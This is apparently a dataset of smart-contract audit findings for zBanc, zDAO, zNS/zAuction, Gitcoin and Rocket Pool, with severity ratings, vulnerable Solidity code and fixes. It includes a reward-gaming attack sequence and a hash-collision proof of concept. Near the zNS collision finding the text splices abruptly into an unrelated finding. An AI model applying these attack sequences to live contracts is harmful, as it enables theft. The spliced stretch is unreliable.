After setting the last var and anchor ownership been transferred, the contract should return active.чч```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n -zBanc - inconsistent DynamicContractRegistry, admin risksчmediumч`DynamicContractRegistry` is a wrapper registry that allows the zBanc to use the custom upgrader contract while still providing access to the normal bancor registry.\\nFor this to work, the registry owner can add or override any registry setting. Settings that don't exist in this contract are attempted to be retrieved from an underlying registry (contractRegistry).\\n```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n\\nIf the item does not exist in the registry, the request is forwarded to the underlying registry.\\n```\\nfunction addressOf(bytes32 \\_contractName) public view override returns (address) {\\n if(items[\\_contractName].contractAddress != address(0)){\\n return items[\\_contractName].contractAddress;\\n }else{\\n return contractRegistry.addressOf(\\_contractName);\\n }\\n}\\n```\\n\\nAccording to the documentation this registry is owned by zer0 admins and this means users have to trust zer0 admins to play fair.\\nTo handle this, we deploy our own ConverterUpgrader and ContractRegistry owned by zer0 admins who can register new addresses\\nThe owner of the registry (zer0 admins) can change the underlying registry contract at will. The owner can also add new or override any settings that already exist in the underlying registry. This may for example allow a malicious owner to change the upgrader contract in an attempt to potentially steal funds from a token converter or upgrade to a new malicious contract. 
The owner can also front-run registry calls changing registry settings and thus influencing the outcome. Such an event will not go unnoticed as events are emitted.\\nIt should also be noted that `itemCount` will return only the number of items in the wrapper registry but not the number of items in the underlying registry. This may have an unpredictable effect on components consuming this information.\\n```\\n/\\*\\*\\n \\* @dev returns the number of items in the registry\\n \\*\\n \\* @return number of items\\n\\*/\\nfunction itemCount() public view returns (uint256) {\\n return contractNames.length;\\n}\\n```\\nчResolution\\nThe client acknowledged the admin risk and addressed the `itemCount` concerns by exposing another method that only returns the overridden entries. The following statement was provided:\\n5.10 - keeping this pattern which matches the bancor pattern, and noting the DCR should be owned by a DAO, which is our plan. solved itemCount issue - Added dcrItemCount and made itemCount call the bancor registry's itemCount, so unpredictable behavior due to the count should be eliminated.\\nRequire the owner/zer0 admins to be a DAO or multisig and enforce 2-step (notify->wait->upgrade) registry updates (e.g. by requiring voting or timelocks in the admin contract). Provide transparency about who is the owner of the registry as this may not be clear for everyone. Evaluate the impact of `itemCount` only returning the number of settings in the wrapper not taking into account entries in the subcontract (including pot. 
overlaps).чч```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n -zBanc - DynamicLiquidTokenConverter consider using PPM_RESOLUTION instead of hardcoding integer literalsчlowч`getMarketCap` calculates the reserve's market capitalization as `reserveBalance * `1e6` / weight` where `1e6` should be expressed as the constant `PPM_RESOLUTION`.\\n```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\nчAvoid hardcoding integer literals directly into source code when there is a better expression available. In this case `1e6` is used because weights are denoted in percent to base `PPM_RESOLUTION` (=100%).чч```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter avoid potential converter type overlap with bancor AcknowledgedчlowчThe system is forked frombancorprotocol/contracts-solidity. As such, it is very likely that security vulnerabilities reported to bancorprotocol upstream need to be merged into the zer0/zBanc fork if they also affect this codebase. There is also a chance that security fixes will only be available with feature releases or that the zer0 development team wants to merge upstream features into the zBanc codebase.\\nzBanc introduced `converterType=3` for the `DynamicLiquidTokenConverter` as `converterType=1` and `converterType=2` already exist in the bancorprotocol codebase. 
Now, since it is unclear if `DynamicLiquidTokenConverter` will be merged into bancorprotocol there is a chance that bancor introduces new types that overlap with the `DynamicLiquidTokenConverter` converter type (3). It is therefore suggested to map the `DynamicLiquidTokenConverter` to a converterType that is unlikely to create an overlap with the system it was forked from. E.g. use converter type id `1001` instead of `3` (Note: converterType is an uint16).\\nNote that the current master of the bancorprotocol already appears to defined converterType 3 and 4: https://github.com/bancorprotocol/contracts-solidity/blob/5f4c53ebda784751c3a90b06aa2c85e9fdb36295/solidity/test/helpers/Converter.js#L51-L54\\nThe new custom converter\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n\\nConverterTypes from the bancor base system\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 1;\\n}\\n```\\n\\n```\\n\\*/\\nfunction converterType() public pure override returns (uint16) {\\n return 2;\\n}\\n```\\nчChoose a converterType id for this custom implementation that does not overlap with the codebase the system was forked from. e.g. 
`uint16(-1)` or `1001` instead of `3` which might already be used upstream.чч```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n -zDAO Token - Specification violation - Snapshots are never taken Partially AddressedчhighчResolution\\nAddressed with zer0-os/[email protected]81946d4 by exposing the `_snapshot()` method to a dedicated snapshot role (likely to be a DAO) and the owner of the contract.\\nWe would like to note that we informed the client that depending on how the snapshot method is used and how predictably snapshots are consumed this might open up a frontrunning vector where someone observing that a `_snapshot()` is about to be taken might sandwich the snapshot call, accumulate a lot of stake (via 2nd markets, lending platforms), and returning it right after it's been taken. The risk of losing funds may be rather low (especially if performed by a miner) and the benefit from a DAO proposal using this snapshot might outweigh it. It is still recommended to increase the number of snapshots taken or take them on a regular basis (e.g. with every first transaction to the contract in a block) to make it harder to sandwich the snapshot taking.\\nAccording to the zDAO Token specification the DAO token should implement a snapshot functionality to allow it being used for DAO governance votings.\\nAny transfer, mint, or burn operation should result in a snapshot of the token balances of involved users being taken.\\nWhile the corresponding functionality is implemented and appears to update balances for snapshots, `_snapshot()` is never called, therefore, the snapshot is never taken. e.g. 
attempting to call `balanceOfAt` always results in an error as no snapshot is available.\\n```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n\\n```\\n\\_updateAccountSnapshot(sender);\\n```\\n\\nNote that this is an explicit requirement as per specification but unit tests do not seem to attempt calls to `balanceOfAt` at all.чActually, take a snapshot by calling `_snapshot()` once per block when executing the first transaction in a new block. Follow the openzeppeling documentation for ERC20Snapshot.чч```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n -zDAO-Token - Revoking vesting tokens right before cliff period expiration might be delayed/front-runnedчlowчThe owner of `TokenVesting` contract has the right to revoke the vesting of tokens for any `beneficiary`. By doing so, the amount of tokens that are already vested and weren't released yet are being transferred to the `beneficiary`, and the rest are being transferred to the owner. The `beneficiary` is expected to receive zero tokens in case the revocation transaction was executed before the cliff period is over. Although unlikely, the `beneficiary` may front run this revocation transaction by delaying the revocation (and) or inserting a release transaction right before that, thus withdrawing the vested amount.\\n```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, \"Nothing to release\");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. 
Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\nчThe issue described above is possible, but very unlikely. However, the `TokenVesting` owner should be aware of that, and make sure not to revoke vested tokens closely to cliff period ending.чч```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, \"Nothing to release\");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. 
Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n -zDAO-Token - Vested tokens revocation depends on claiming stateчlowчThe owner of the `TokenVesting` contract can revoke the vesting of tokens for any beneficiary by calling `TokenVesting.revoke` only for tokens that have already been claimed using `MerkleTokenVesting.claimAward`. Although anyone can call `MerkleTokenVesting.claimAward` for a given beneficiary, in practice it is mostly the beneficiary's responsibility. This design decision, however, incentivizes the beneficiary to delay the call to `MerkleTokenVesting.claimAward` up to the point when he wishes to cash out, to avoid potential revocation. 
To revoke vesting tokens the owner will have to claim the award on the beneficiary's behalf first (which might be a gas burden), then call `TokenVesting.revoke`.\\n```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\nчMake sure that the potential owner of a `TokenVesting` contract is aware of this potential issue, and has the required processes in place to handle it.чч```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n -zNS - 
Domain bid might be approved by non owner accountчhighчThe spec allows anyone to place a bid for a domain, while only parent domain owners are allowed to approve a bid. Bid placement is actually enforced and purely informational. In practice, `approveDomainBid` allows any parent domain owner to approve bids (signatures) for any other domain even if they do not own it. Once approved, anyone can call `fulfillDomainBid` to create a domain.\\n```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\nчResolution\\nAddressed with zer0-os/[email protected] by storing the domain request data on-chain.\\nConsider adding a validation check that allows only the parent domain owner to approve bids on one of its domains. Reconsider the design of the system introducing more on-chain guarantees for bids.чч```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\n -zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclearчhighчThe lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. 
The new owner can now force a sale of the asset even though it might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise an old bid might be accepted even after the formal auction is over.
\"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\nчConsider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\nчч```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n -zNS - Insufficient protection against replay attacksчhighчThere is no dedicated data structure to prevent replay attacks on `StakingController`. 
`approvedBids` mapping offers only partial mitigation, due to the fact that after a domain bid is fulfilled, the only mechanism in place to prevent a replay attack is the `Registrar` contract that might be replaced in the case where `StakingController` is being re-deployed with a different `Registrar` instance. Additionally, the digital signature used for domain bids does not identify the buyer request uniquely enough. The bidder's signature could be replayed in future similar contracts that are deployed with a different registrar or in a different network.\\n```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\nчConsider adding a dedicated mapping to store the a unique identifier of a bid, as well as adding `address(this)`, `block.chainId`, `registrar` and `nonce` to the message that is being signed by the bidder.чч```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\n -zNS - domain name collisionsчhighчDomain registration accepts an empty (zero-length) name. This may allow a malicious entity to register two different NFT's for the same visually indinstinguishable text representation of a domain. Similar to this the domain name is mapped to an NFT via a subgraph that connects parent names to the new subdomain using a domain separation character (dot/slash/…). 
Someone might be able to register `a.b` to `cats.cool` which might resolve to the same domain as if someone registers `cats.cool.a` and then `cats.cool.a.b`.\\n`0/cats/` = `0xfe`\\n`0/cats/ refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n\\nBy staking just before claiming, the node effectively can earn rewards for 2 reward periods by only staking RPL for the duration of one period (claim the previous period, leave it in for 14 days, claim another period, withdraw).\\nThe stake can be withdrawn at the earliest 14 days after staking. However, it can be added back at any time, and the stake addition takes effect immediately. This allows for optimizing the staking reward as follows (assuming we front-run other claimers to maximize profits and perform all transactions in one block):\\n```\\n[stake max effective amount for the number of minipools]\\n[claim() to claim the previous period even though we did not provide any stake for the duration]\\n[optionally dissolve Minipools unlocking ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipool)]\\n[lend RPL to other platforms and earn interest]\\n-- 14 days forward -new reward period started --\\n[get RPL back from another platform]\\n[stake & create minipools to inflate effective stake]\\n[claim()]\\n[optionally dissolve Minipools to unlock node ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipools)]\\n[lend RPL to other platforms and earn interest]\\n// rest of code\\n```\\n\\nNote that `withdraw()` can be called right at the time the new reward period 
starts:\\n```\\nrequire(block.number.sub(getNodeRPLStakedBlock(msg.sender)) >= rocketDAOProtocolSettingsRewards.getRewardsClaimIntervalBlocks(), \"The withdrawal cooldown period has not passed\");\\n// Get & check node's current RPL stake\\n```\\n\\nA node may choose to register and stake some RPL to collect rewards but never actually provide registered node duties, e.g., operating a Minipool.\\nNode shares for a passed reward epoch are unpredictable as nodes may change their stake (adding) after/before users claim their rewards.\\nA node can maximize its rewards by adding stake just before claiming it\\nA node can stake to claim rewards, wait 14 days, withdraw, lend on a platform and return the stake in time to claim the next period.чReview the incentive model for the RPL rewards. Consider adjusting it so that nodes that provide a service get a better share of the rewards. Consider accruing rewards for the duration the stake was provided instead of taking a snapshot whenever the node calls `claim()`. 
Require stake to be locked for > 14 days instead of >=14 days (withdraw()) or have users skip the first reward period after staking.чч```\\n-- reward period ends -- front-run other claimers to maximize profits\\n[create x minipools]\\n[stake to max effective RPL for amount of minipools; locked for 14 days]\\n[claim rewards for inflated effective RPL stake]\\n[dissolve(), close() minipools -> refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n -Prefer using abi.encode in TokenDistributorчmediumчThe method `_hashLeaf` is called when a user claims their airdrop.\\n```\\n// can we repoduce leaf hash included in the claim?\\nrequire(\\_hashLeaf(user\\_id, user\\_amount, leaf), 'TokenDistributor: Leaf Hash Mismatch.');\\n```\\n\\nThis method receives the `user_id` and the `user_amount` as arguments.\\n```\\n/\\*\\*\\n\\* @notice hash user\\_id + claim amount together & compare results to leaf hash \\n\\* @return boolean true on match\\n\\*/\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n\\nThese arguments are abi encoded and hashed together to produce a unique hash.\\n```\\nbytes32 leaf\\_hash = keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is checked against the third argument for equality.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nIf the hash matches the third argument, it returns true and considers the provided `user_id` and `user_amount` are correct.\\nHowever, packing differently sized arguments may produce collisions.\\nThe Solidity documentation states that packing dynamic types will produce collisions, but this is also the case if packing `uint32` and `uint256`.\\nBelow there's an example showing that packing `uint32` and `uint256` in both orders can produce collisions with carefully 
picked values.\\n```\\nlibrary Encode {\\n function encode32Plus256(uint32 \\_a, uint256 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n \\n function encode256Plus32(uint256 \\_a, uint32 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n}\\n\\ncontract Hash {\\n function checkEqual() public pure returns (bytes32, bytes32) {\\n // Pack 1\\n uint32 a1 = 0x12345678;\\n uint256 b1 = 0x99999999999999999999999999999999999999999999999999999999FFFFFFFF;\\n \\n // Pack 2\\n uint256 a2 = 0x1234567899999999999999999999999999999999999999999999999999999999;\\n uint32 b2 = 0xFFFFFFFF;\\n \\n // Encode these 2 different values\\n bytes memory packed1 = Encode.encode32Plus256(a1, b1);\\n bytes memory packed2 = Encode.encode256Plus32(a2, b2);\\n \\n // Check if the packed encodings match\\n require(keccak256(packed1) == keccak256(packed2), \"Hash of representation should match\");\\n \\n // The hashes are the same\\n // 0x9e46e582607c5c6e05587dacf66d311c4ced0819378a41d4b4c5adf99d72408e\\n return (\\n keccak256(packed1),\\n keccak256(packed2)\\n );\\n }\\n}\\n```\\n\\nChanging `abi.encodePacked` to `abi.encode` in the library will make the transaction fail with error message `Hash of representation should match`.чResolution\\nFixed in gitcoinco/governance#7\\nUnless there's a specific use case to use `abi.encodePacked`, you should always use `abi.encode`. You might need a few more bytes in the transaction data, but it prevents collisions. 
A similar fix can be achieved by using `uint256` for both values to be packed to prevent any possible collisions.
keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is then checked if it matches the third argument.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nThe result of the equality is returned by the method.\\nThe name of the method is confusing because it should say that it returns true if the leaf is considered valid.чResolution\\nClosed because the method was removed in gitcoinco/governance#4\\nConsider renaming the method to something like `isValidLeafHash`.чч```\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n -Method returns bool but result is never used in TokenDistributor.claimTokensчlowчThe method `_delegateTokens` is called when a user claims their tokens to automatically delegate the claimed tokens to their own address or to a different one.\\n```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n\\nThe method accepts the addresses of the delegator and the delegate and returns a boolean.\\n```\\n/\\*\\*\\n\\* @notice execute call on token contract to delegate tokens \\n\\* @return boolean true on success \\n\\*/\\nfunction \\_delegateTokens(address delegator, address delegatee) private returns (bool) {\\n GTCErc20 GTCToken = GTCErc20(token);\\n GTCToken.delegateOnDist(delegator, delegatee);\\n return true; \\n} \\n```\\n\\nBut this boolean is never used.чRemove the returned boolean because it's always returned as `true` anyway and the transaction will be a bit cheaper.чч```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n -Improve efficiency by using immutable in TreasuryVesterчlowчThe `TreasuryVester` contract when deployed has a few fixed storage variables.\\n```\\ngtc = gtc\\_;\\n```\\n\\n```\\nvestingAmount = vestingAmount\\_;\\nvestingBegin = vestingBegin\\_;\\nvestingCliff = vestingCliff\\_;\\nvestingEnd = vestingEnd\\_;\\n```\\n\\nThese storage variables are defined in the contract.\\n```\\naddress public 
gtc;\\n```\\n\\n```\\nuint public vestingAmount;\\nuint public vestingBegin;\\nuint public vestingCliff;\\nuint public vestingEnd;\\n```\\n\\nBut they are never changed.чResolution\\nFixed in gitcoinco/governance#5\\nConsider setting storage variables as `immutable` type for a considerable gas improvement.чч```\\ngtc = gtc\\_;\\n```\\n -RocketDaoNodeTrusted - DAO takeover during deployment/bootstrappingчhighчThe initial deployer of the `RocketStorage` contract is set as the Guardian/Bootstrapping role. This guardian can bootstrap the TrustedNode and Protocol DAO, add members, upgrade components, change settings.\\nRight after deploying the DAO contract the member count is zero. The Guardian can now begin calling any of the bootstrapping functions to add members, change settings, upgrade components, interact with the treasury, etc. The bootstrapping configuration by the Guardian is unlikely to all happen within one transaction which might allow other parties to interact with the system while it is being set up.\\n`RocketDaoNodeTrusted` also implements a recovery mode that allows any registered node to invite themselves directly into the DAO without requiring approval from the Guardian or potential other DAO members as long as the total member count is below `daoMemberMinCount` (3). 
The Guardian itself is not counted as a DAO member as it is a supervisory role.\\n```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(\"proposalInvite(string,string,address)\", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(\"rocketDAONodeTrustedActions\").call(abi.encodeWithSignature(\"actionJoinRequired(address)\", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n\\nThis opens up a window during the bootstrapping phase where any Ethereum Address might be able to register as a node (RocketNodeManager.registerNode) if node registration is enabled (default=true) rushing into `RocketDAONodeTrusted.memberJoinRequired` adding themselves (up to 3 nodes) as trusted nodes to the DAO. The new DAO members can now take over the DAO by issuing proposals, waiting 2 blocks to vote/execute them (upgrade, change settings while Guardian is changing settings, etc.). 
The Guardian role can kick the new DAO members, however, they can invite themselves back into the DAO.\\n```\\nsetSettingBool(\"node.registration.enabled\", true); \\n```\\nчDisable the DAO recovery mode during bootstrapping. Disable node registration by default and require the guardian to enable it. Ensure that `bootstrapDisable` (in both DAO contracts) performs sanity checks as to whether the DAO bootstrapping finished and permissions can effectively be revoked without putting the DAO at risk or in an irrecoverable state (enough members bootstrapped, vital configurations like registration and other settings are configured, …).чч```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(\"proposalInvite(string,string,address)\", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(\"rocketDAONodeTrustedActions\").call(abi.encodeWithSignature(\"actionJoinRequired(address)\", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n -RocketDaoNodeTrustedActions - 
Incomplete implementation of member challenge processчhighчAny registered (even untrusted) node can challenge a trusted DAO node to respond. The challenge is initiated by calling `actionChallengeMake`. Trusted nodes can challenge for free, other nodes have to provide `members.challenge.cost` as a tribute to the Ethereum gods. The challenged node must call `actionChallengeDecide` before `challengeStartBlock + members.challenge.window` blocks are over (default approx 7 days). However, the Golang codebase does not actively monitor for the `ActionChallengeMade` event, nor does the node - regularly - check if it is being challenged. Means to respond to the challenge (calling `actionChallengeDecide` to stop the challenge) are not implemented.\\nNodes do not seem to monitor `ActionChallengeMade` events so that they could react to challenges\\nNodes do not implement `actionChallengeDecide` and, therefore, cannot successfully stop a challenge\\nFunds/Tribute sent along with the challenge will be locked forever in the `RocketDAONodeTrustedActions` contract. There's no means to recover the funds.\\nIt is questionable whether the incentives are aligned well enough for anyone to challenge stale nodes. The default of `1 eth` compared to the risk of the “malicious” or “stale” node exiting themselves is quite high. The challenger is not incentivized to challenge someone other than for taking over the DAO. If the tribute is too low, this might incentivize users to grief trusted nodes and force them to close a challenge.\\nRequiring that the challenge initiator is a different registered node than the challenge finalized is a weak protection since the system is open to anyone to register as a node (even without depositing any funds.)\\nblock time is subject to fluctuations. 
With the default of `43204` blocks, the challenge might expire at `5 days` (10 seconds block time), `6.5 days` (13 seconds Ethereum target median block time), `7 days` (14 seconds), or more with historic block times going up to `20 seconds` for shorter periods.\\nA minority of trusted nodes may use this functionality to boot other trusted node members off the DAO issuing challenges once a day until the DAO member number is low enough to allow them to reach quorum for their own proposals or until the member threshold allows them to add new nodes without having to go through the proposal process at all.\\n```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should 